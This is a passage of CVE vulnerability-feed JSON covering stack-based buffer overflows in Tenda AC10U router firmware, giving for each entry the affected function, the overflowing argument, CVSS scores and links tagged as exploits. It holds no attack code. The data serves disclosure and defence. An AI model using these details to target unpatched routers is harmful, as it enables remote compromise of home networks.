"problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-121" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formSetDeviceName.md", "name" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formSetDeviceName.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formSetDeviceName.md", "name" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formSetDeviceName.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252128", "name" : "https://vuldb.com/?ctiid.252128", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252128", "name" : "https://vuldb.com/?ctiid.252128", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252128", "name" : "https://vuldb.com/?id.252128", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252128", "name" : "https://vuldb.com/?id.252128", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in Tenda AC10U 15.03.06.49_multi_TDE01. Affected by this issue is the function formSetDeviceName. The manipulation of the argument devName leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252128. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tendacn:ac10u_firmware:15.03.06.49_multi_tde01:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tendacn:ac10u:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-26T14:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0924", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formSetPPTPServer.md", "name" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formSetPPTPServer.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formSetPPTPServer.md", "name" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formSetPPTPServer.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252129", "name" : "https://vuldb.com/?ctiid.252129", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252129", "name" : "https://vuldb.com/?ctiid.252129", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252129", "name" : "https://vuldb.com/?id.252129", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252129", "name" : "https://vuldb.com/?id.252129", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, was found in Tenda AC10U 15.03.06.49_multi_TDE01. This affects the function formSetPPTPServer. The manipulation of the argument startIp leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252129 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:ac10u_firmware:15.03.06.49_multi_tde01:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:ac10u:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-26T15:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0925", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-121" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formSetVirtualSer.md", "name" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formSetVirtualSer.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formSetVirtualSer.md", "name" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formSetVirtualSer.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252130", "name" : "https://vuldb.com/?ctiid.252130", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252130", "name" : "https://vuldb.com/?ctiid.252130", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252130", "name" : "https://vuldb.com/?id.252130", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252130", "name" : "https://vuldb.com/?id.252130", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in Tenda AC10U 15.03.06.49_multi_TDE01 and classified as critical. This vulnerability affects the function formSetVirtualSer. The manipulation of the argument list leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-252130 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tendacn:ac10u_firmware:15.03.06.49_multi_tde01:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tendacn:ac10u:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-26T15:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0926", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-121" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formWifiWpsOOB.md", "name" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formWifiWpsOOB.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formWifiWpsOOB.md", "name" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/formWifiWpsOOB.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252131", "name" : "https://vuldb.com/?ctiid.252131", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252131", "name" : "https://vuldb.com/?ctiid.252131", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252131", "name" : "https://vuldb.com/?id.252131", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252131", "name" : "https://vuldb.com/?id.252131", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Tenda AC10U 15.03.06.49_multi_TDE01 and classified as critical. This issue affects the function formWifiWpsOOB. The manipulation of the argument index leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252131. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tendacn:ac10u_firmware:15.03.06.49_multi_tde01:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tendacn:ac10u:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-26T15:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0927", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-121" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/fromAddressNat_1.md", "name" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/fromAddressNat_1.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/fromAddressNat_1.md", "name" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/fromAddressNat_1.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252132", "name" : "https://vuldb.com/?ctiid.252132", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252132", "name" : "https://vuldb.com/?ctiid.252132", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252132", "name" : "https://vuldb.com/?id.252132", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252132", "name" : "https://vuldb.com/?id.252132", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Tenda AC10U 15.03.06.49_multi_TDE01. It has been classified as critical. Affected is the function fromAddressNat. The manipulation of the argument entrys/mitInterface/page leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252132. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tendacn:ac10u_firmware:15.03.06.49_multi_tde01:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tendacn:ac10u:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-26T15:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0928", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-121" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/fromDhcpListClient_1.md", "name" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/fromDhcpListClient_1.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/fromDhcpListClient_1.md", "name" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/fromDhcpListClient_1.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252133", "name" : "https://vuldb.com/?ctiid.252133", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252133", "name" : "https://vuldb.com/?ctiid.252133", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252133", "name" : "https://vuldb.com/?id.252133", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252133", "name" : "https://vuldb.com/?id.252133", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Tenda AC10U 15.03.06.49_multi_TDE01. It has been declared as critical. Affected by this vulnerability is the function fromDhcpListClient. The manipulation of the argument page/listN leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252133 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tendacn:ac10u_firmware:15.03.06.49_multi_tde01:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tendacn:ac10u:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-26T16:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0929", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-121" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/fromNatStaticSetting.md", "name" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/fromNatStaticSetting.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/fromNatStaticSetting.md", "name" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/fromNatStaticSetting.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252134", "name" : "https://vuldb.com/?ctiid.252134", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252134", "name" : "https://vuldb.com/?ctiid.252134", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252134", "name" : "https://vuldb.com/?id.252134", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252134", "name" : "https://vuldb.com/?id.252134", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Tenda AC10U 15.03.06.49_multi_TDE01. It has been rated as critical. Affected by this issue is the function fromNatStaticSetting. The manipulation of the argument page leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252134 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tendacn:ac10u_firmware:15.03.06.49_multi_tde01:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tendacn:ac10u:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-26T16:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0930", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-121" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/fromSetWirelessRepeat.md", "name" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/fromSetWirelessRepeat.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/fromSetWirelessRepeat.md", "name" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/fromSetWirelessRepeat.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252135", "name" : "https://vuldb.com/?ctiid.252135", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252135", "name" : "https://vuldb.com/?ctiid.252135", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252135", "name" : "https://vuldb.com/?id.252135", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252135", "name" : "https://vuldb.com/?id.252135", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical has been found in Tenda AC10U 15.03.06.49_multi_TDE01. This affects the function fromSetWirelessRepeat. The manipulation of the argument wpapsk_crypto leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252135. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tendacn:ac10u_firmware:15.03.06.49_multi_tde01:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tendacn:ac10u:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-26T16:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0931", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-121" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/saveParentControlInfo_1.md", "name" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/saveParentControlInfo_1.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/saveParentControlInfo_1.md", "name" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/saveParentControlInfo_1.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252136", "name" : "https://vuldb.com/?ctiid.252136", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252136", "name" : "https://vuldb.com/?ctiid.252136", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252136", "name" : "https://vuldb.com/?id.252136", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252136", "name" : "https://vuldb.com/?id.252136", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in Tenda AC10U 15.03.06.49_multi_TDE01. This vulnerability affects the function saveParentControlInfo. The manipulation of the argument deviceId/time/urls leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252136. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tendacn:ac10u_firmware:15.03.06.49_multi_tde01:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tendacn:ac10u:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-26T17:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0932", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-121" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/setSmartPowerManagement.md", "name" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/setSmartPowerManagement.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/setSmartPowerManagement.md", "name" : "https://github.com/yaoyue123/iot/blob/main/Tenda/AC10U/setSmartPowerManagement.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252137", "name" : "https://vuldb.com/?ctiid.252137", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252137", "name" : "https://vuldb.com/?ctiid.252137", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252137", "name" : "https://vuldb.com/?id.252137", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252137", "name" : "https://vuldb.com/?id.252137", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in Tenda AC10U 15.03.06.49_multi_TDE01. This issue affects the function setSmartPowerManagement. The manipulation of the argument time leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252137 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tendacn:ac10u_firmware:15.03.06.49_multi_tde01:*:*:*:*:*:*:*", "cpe_name" : [ ] 